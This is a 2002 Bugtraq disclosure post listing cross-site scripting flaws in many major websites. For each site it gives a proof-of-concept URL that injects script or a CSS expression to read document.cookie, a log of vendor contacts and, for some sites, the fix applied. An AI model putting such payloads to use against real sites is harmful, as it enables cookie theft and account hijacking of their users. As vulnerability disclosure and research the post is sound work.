Cross site scripting in almost every mayor website

From: Berend-Jan Wever (skylinedat_private)
Date: Fri Apr 19 2002 - 10:28:06 PDT

    On april 26 I posted a message about Cross-Site
    scripting (see bottom) I mentioned that I had
    found Cross-site scripting flaws in many major
    websites but I did not publish the exact details of
    these flaws. After notifying the owners of these
    sites and giving them time to respond and fix the
    problem, I now feel I have to post the details to
    bugtraq. This information and more on cross-site
    scripting can also be found on my website
    http://spoor12.edup.tudelft.nl/skylined which is
    updated almost daily.

    Kind regards,
    Berend-Jan Wever.

    Cross-site scripting archive: Here are all the sites
    that I know to have at least one cross-site
    scripting flaw. I have logged all the
    communication I have had with them. (Last
    update April 19, 2002)

    www.search.com  http://www.search.com/search?
    q='><SCRIPT>alert(document.cookie)
    </SCRIPT>'
    - 23 mar 2002 Reported
    @ "http://www.cnet.com/cnetsupport/contact/1,10
    161,0-3945,00.html"
    - 28 mar 2002 Reported
    @ "http://www.search.com/feedback/"

    --------------

    www.altavista.com
    http://www.altavista.com/sites/search/web?
    q=*&kl="><SCRIPT>alert(document.cookie)
    </SCRIPT>
    - 23 mar 2002 Reported
    @ "http://help.altavista.com/contact/search"
    - 25 mar 2002 Reply by email: "We have
    forwarded your email to our engineering team for
    further investigation"

    --------------

    edit.yahoo.com
    http://edit.yahoo.com/config?.done="%
    20style="width:expression(document.write
    (document.cookie));
    - 27 mar 2002 Reported to "arturo@yahoo-
    inc.com", "mfk@yahoo-inc.com"

    --------------

    search.netscape.com
    addressbook.netscape.com
    http://search.netscape.com/search.psp?
    search="><SCRIPT>alert(document.cookie)
    </SCRIPT>
    http://addressbook.netscape.com/search.adp?
    SearchStr="><SCRIPT>alert(document.cookie)
    </SCRIPT>
    (Addressbook.netscape.com requires you to be
    logged in)
    - 23 mar 2002 Reported
    @ "http://help.netscape.com/website/feedback.ht
    ml"

    --------------

    cq-search.ebay.com  http://cq-
    search.ebay.com/search/search.dll?
    MfcISAPICommand=GetResult&ht="><SCRIPT>a
    lert(document.cookie)</SCRIPT>&query=a
    - 26 mar 2002 Reported to "clalondeat_private"
    - 27 mar 2002 Reply by email: "Reviewing the
    issue", "Do you have any suggestions?"
    - 27 mar 2002 Gave some hints and told them
    about my CSS howto.

    --------------

    www.amazon.com
    http://www.amazon.com/exec/obidos/ASIN/B0000
    5T68P/ref%3D%20style%3Dwidth%
    3Aexpression%28document.write%
    28document.cookie%29%29%20/
    - 23 mar 2002 Reported
    @ "http://www.amazon.com/exec/obidos/handle-
    generic-form/102-3185800-6674542?action=next-
    page&target=stores/help/self-service-email-form-
    dispatch.html&display=basic&browse=560710&m
    ethod=GET&cgi-post-result=1/102-3185800-
    6674542."
    - 26 mar 2002 "Cyrusat_private" responded
    to my bugtraq post
    - 26 mar 2002 Reported to "Cyrusat_private"
    - 26 mar 2002 Told them about my CSS howto.

    --------------

    www.looksmart.com cnn.looksmart.com
     http://www.looksmart.com/r_search?
    look=&key=><SCRIPT>alert(document.cookie)
    </SCRIPT>
    http://cnn.looksmart.com/r_search?
    look=&key=><SCRIPT>alert(document.cookie)
    </SCRIPT>
    - 23 mar 2002 Reported
    to "feedbackat_private"

    --------------

    www.time.com
    http://www.time.com/time/searchresults?
    query=a&summaries="%
    20style="width:expression(document.write
    (document.cookie))"
    - 23 mar 2002 Reported to "dailyat_private"
    - 26 mar 2002 Reported
    to "Renee_Guttmannat_private"

    --------------

    www.infospace.com
    http://www.infospace.com/info.xcite/dog/newsresul
    ts.htm?&qkw="><SCRIPT>alert(document.cookie)
    </SCRIPT>&qcat=news&fs=nws
    - 23 mar 2002 Reported
    @ "http://www.infospace.com/info/redirs_all.htm?
    pgtarg=abtct&"

    --------------

    www.lasseters.com.au
    http://www.lasseters.com.au/default3.asp?
    Network="%20onload="alert(document.cookie);"%
    20z="
    - 28 mar 2002 Reported
    @ "http://www.lasseters.com.au/help/onetoone.ht
    ml" to Karl F (chatid 114640)
    - 28 mar 2002 Reported
    to "supportat_private"
    - 28 mar 2002 (Automated) reply by email: "our
    priority is to respond to your query as soon as
    possible", tracking number T20020328004M
    - 28 mar 2002 Reply by email: "We are
    investigating this issue very seriously", "I have
    passed this information onto the relevant
    department"

    --------------

    my.abcnews.go.com
    http://my.abcnews.go.com/localpageMainHandler
    ?input=<SCRIPT>alert(document.cookie)
    </SCRIPT>
    - 28 mar 2002 Reported
    @ "http://abcnews.go.com/service/Help/abccontac
    tform.html"

    Fixed cross-site scripting flaws archive
    Here are all the cross-site scripting flaws I
    uncovered which have been fixed now. This is
    just to show how it was done and who have been
    found wanting.
    www.redhat.com
    http://www.redhat.com/apps/search/results.html?
    ie="><SCRIPT>alert(document.cookie)
    </SCRIPT>
    - 26 mar 2002 "mjcat_private" responded to
    my bugtraq post.
    - 26 mar 2002 Reported to "mjcat_private"
    - 26 mar 2002 Reply
    from "tlancastat_private": "Fixed now"

    site scripting page for more information
    - 19 mar 2002 Reported @ "Report a bug on the
    Hotmail website" (url contained sensitive
    information ;)~
    - 22 mar 2002 Reported
    to "supportat_private" - bounced
    - 23 mar 2002 Reply
    from "abuseat_private": "Look at
    the help if you have any problems using hotmail"
    - 27 mar 2002 Explained it was a serious issue
    to "abuseat_private"
    - 27 mar 2002 Reply
    from "abuseat_private": "Your e-
    mail has been forwarded to the appropriate team"
    - 28 mar 2002 Reply
    from "support_xat_private": "We
    have tried to reproduce the error, but have been
    unable to do so"
    - 29 mar 2002 Send a working example
    to "cs_servat_private"
    - 30 mar 2002 Reply
    from "cs_servat_private": "We have
    confirmed the issue that you describe and are
    currently working on a fix"
    - 30 mar 2002 Reply
    from "cs_servat_private": "we have isolated
    the bug and expect to have a fix for it out by
    Wednesday." (3 apr 2002)
    The fix: as far as I could find out they now replace
    the properties 'dataFld', 'dataFormatAs'
    and 'dataSrc' of any HTML tag
    with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to
    prevent XML generation of HTML alltogether.
    MSN Hotmail has been very polite to thank me for
    bringing this to their attention multiple times.

    --------------

    search.microsoft.com
    http://search.microsoft.com/default.asp?qu=";%
    0D%0Aalert(document.cookie);%0D%
    0Aa="&boolean=ALL
    This one was fixed within hours after discovery
    and without me notifying microsoft, now that's
    service!

    --------------

    www.google.com  http://www.google.nl/search?
    as_q=a&ie="><SCRIPT>alert(document.cookie)
    </SCRIPT>
    - 23 mar 2002 Reported
    to "webmasterat_private"
    - 23 mar 2002 (Automated) reply by email: "you'll
    hear from us soon"
    The fix: all '<' and '>' characters are replaced
    with '_'.
    I have not received a word from Google except
    for the automated responds. (Guess whether I'm
    gonna report the next CSS to them...)

    --------------

    www.nic.cc  http://www.nic.cc/cgi-bin/cart?
    domain=&lt;SCRIPT&gt;alert(document.cookie)
    &lt;/SCRIPT&gt;
    - 23 mar 2002 Reported to "clientcareat_private"
    The fix: filter out '<' and '>'.
    I have not received a word from Nic.cc. (Guess
    whether I'm gonna report the next CSS to them...)

    --------------

    support.microsoft.com
    http://support.microsoft.com/default.aspx?scid=');}
    alert(document.cookie);{//
    - 28 mar 2002 Reported
    to "supportat_private"
    - 28 mar 2002 (Automated) reply by email: "Your
    e-mail <snip> will be handled personally by one
    of our Customer Service Representatives within
    24 hours"
    The fix: The ' in the expoit url used to end a string
    but this string is now enclosed by " instead of ',
    the " character is filtered out.
    I have not received a word from microsoft support
    except for the automated responds. (Guess
    whether I'm gonna report the next CSS to them...)

    --------------

    download.cnet.com
    http://download.cnet.com/downloads/1,10150,0-
    10001-103-0-1-7,00.html?qt=&lt;SCRIPT&gt;alert
    (document.cookie)&lt;/SCRIPT&gt;
    - 28 mar 2002 Reported
    @ "http://download.cnet.com/downloads/0-10000-
    7-1532857.html?tag=subnav"
    The fix: The characters <, > and " are replaced
    with &lt;, &gt; and &quot;.

    www.nu  http://www.nu/tour/tour_images.cfm?
    ID=EN&site=&lt;SCRIPT&gt;alert(document.cookie)
    &lt;/SCRIPT&gt;
    (The error report would suggest a SQL-injection
    vulnerability but I have not done further testing.)
    - 23 mar 2002 Reported both CSS & SQL-
    injection to "dwdat_private"
    - 19 apr 2002 The bug seems to have been fixed.